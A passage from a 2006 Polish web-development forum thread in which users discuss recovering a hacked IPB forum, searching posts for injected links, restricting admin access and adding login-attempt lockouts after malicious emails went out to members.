Proponuję też przeglądnąć logi samego IPB, czy nie zostały wysłane jakieś mass-maile. Poza tym proponuję przeszukać tematy pod kątem frazy "loadadv", mogą być dodane różne linki w tematach.

Jako zabezpieczenie proponujemy wprowadzenie sprawdzania ilości błędnie wpisanych haseł i blokada czasowa po powiedzmy 3 nieudanych próbach.


--------------------
Michał Płachta
Warsztat: Mac OS X Leopard, PostgreSQL, Text Mate, Retrospectiva + SVN
Go to the top of the page
+Quote Post
nospor
post
Post #53





Grupa: Moderatorzy
Postów: 36 557
Pomógł: 6315
Dołączył: 27.12.2004




Cytat
Trzeba mieć dostęp do panelu administratora forum

Cytat
Pozniej nasz admin stracil prawa admina i nie mamy juz admina na forum.

i zonk smile.gif
trzeba wiec w bazie (poprzez PMA) w tabeli "_ipb_templates" zedytowac rekord, badz tez w bazie ustawic prawa administratora na dane konto


--------------------

"Myśl, myśl, myśl..." - Kubuś Puchatek || "Manual, manual, manual..." - Kubuś Programista
"Szukaj, szukaj, szukaj..." - Kubuś Odkrywca || "Debuguj, debuguj, debuguj..." - Kubuś Developer

Go to the top of the page
+Quote Post
hOMER
post
Post #54





Grupa: Zarejestrowani
Postów: 4
Pomógł: 0
Dołączył: 30.09.2005

Ostrzeżenie: (0%)
-----


Cytat(seaquest @ 2006-05-09 13:48:27)
Jako zabezpieczenie proponujemy wprowadzenie sprawdzania ilości błędnie wpisanych haseł i blokada czasowa po powiedzmy 3 nieudanych próbach.

ok. mamy juz admina

a jak zmienic te logowania na 3 bo niemozemy tego znalesc?
Go to the top of the page
+Quote Post
seaquest
post
Post #55





Grupa: Przyjaciele php.pl
Postów: 790
Pomógł: 7
Dołączył: 6.02.2003
Skąd: Polska

Ostrzeżenie: (0%)
-----


Trzeba ręcznie dopisać.


--------------------
Michał Płachta
Warsztat: Mac OS X Leopard, PostgreSQL, Text Mate, Retrospectiva + SVN
Go to the top of the page
+Quote Post
hOMER
post
Post #56





Grupa: Zarejestrowani
Postów: 4
Pomógł: 0
Dołączył: 30.09.2005

Ostrzeżenie: (0%)
-----


jakaś wskazóweczka gdzie i co? snitch.gif
Go to the top of the page
+Quote Post
kwiateusz
post
Post #57


Admin Techniczny


Grupa: Administratorzy
Postów: 2 071
Pomógł: 93
Dołączył: 5.07.2005
Skąd: Olsztyn




trzeba wlasnego moda splodzic ktory bedzie dziala tak ajk wyzej opisano.. lub dac moda ktory przeniesie acp do innego pliku (o ile ejst do twojej wersji forum) ew. w .htacess ustawic zeby do panelu admina mieli dostep tylko osoby z odpowiednich ip ..
Go to the top of the page
+Quote Post
LBO
post
Post #58





Grupa: Zarejestrowani
Postów: 1 415
Pomógł: 117
Dołączył: 7.09.2005
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Właśnie dostałem owego maila z linkiem do zainfekowanego pliku.

Coś się spóźniliście :-) hehehe
Go to the top of the page
+Quote Post
GrayHat
post
Post #59





Grupa: Zarejestrowani
Postów: 566
Pomógł: 18
Dołączył: 23.08.2003
Skąd: Łomża

Ostrzeżenie: (0%)
-----


tez wlasnie dostalem maila z tym linkiem winksmiley.jpg


--------------------
*Note: No animals were killed durning the construction of this post.
Go to the top of the page
+Quote Post
onekamel
post
Post #60





Grupa: Zarejestrowani
Postów: 8
Pomógł: 0
Dołączył: 26.02.2006

Ostrzeżenie: (0%)
-----


Witam
powrocmy do tematu maila z przeprosinami i maila z linkiem do dziwnego pliku. Dlaczego maila z przeprosinami dostalem cos kolo 07.05.2006 a maila z linkiem do zainfekowanego pliku dopiero 13.05. Czy kolejnosc nadejscia maili nie powinna byc odwrotna?
Go to the top of the page
+Quote Post
seaquest
post
Post #61





Grupa: Przyjaciele php.pl
Postów: 790
Pomógł: 7
Dołączył: 6.02.2003
Skąd: Polska

Ostrzeżenie: (0%)
-----


Powinna, ale część maili podochodziła później. Dlaczego? Ciężko powiedzieć.


--------------------
Michał Płachta
Warsztat: Mac OS X Leopard, PostgreSQL, Text Mate, Retrospectiva + SVN
Go to the top of the page
+Quote Post

4 Stron V   1 2 3 > » 
Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 22.08.2025 - 08:08